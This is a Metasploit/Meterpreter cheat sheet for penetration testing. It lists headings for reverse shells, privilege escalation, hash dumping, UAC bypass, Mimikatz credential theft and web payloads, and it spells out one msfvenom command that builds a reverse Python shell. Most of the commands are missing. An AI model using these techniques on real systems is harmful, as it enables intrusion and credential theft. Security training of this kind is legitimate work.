🐮Meterpreter Cheat Sheet
Windows reverse meterpreter payload
Windows reverse tcp payload
Windows VNC Meterpreter payload
Meterpreter Windows VNC Payload
Linux Reverse Meterpreter payload
Meterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
Meterpreter upload file to Windows target
Meterpreter download file from Windows target
Meterpreter download file from Windows target
Meterpreter run .exe on target – handy for executing uploaded exploits
Creates new channel with cmd shell
Meterpreter show processes
Meterpreter get shell on the target
Meterpreter attempts priviledge escalation the target
Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)
Meterpreter create port forward to target machine
Meterpreter delete port forward
Bypass UAC on Windows 7 + Set target + arch, x86/64
Metasploit HTTP directory scanner
Metasploit JBOSS vulnerability scanner
Metasploit MSSQL Credential Scanner
Metasploit MSSQL Version Scanner
Metasploit Oracle Login Module
Metasploit powershell payload delivery module
Metasploit upload and run powershell script through a session
Metasploit JBOSS deploy
Metasploit MSSQL payload
Metasploit show privileges of current user
Metasploit grab GPP saved passwords
Metasploit load Mimikatz/kiwi and get creds
Idenitfy other machines that the supplied domain user has administrative access to
Meterpreter Payloads
List options
Binaries
Web Payloads
PHP
Listener
PHP
ASP
JSP
WAR
Scripting Payloads
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Python
Bash
Perl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
An example is:
Last updated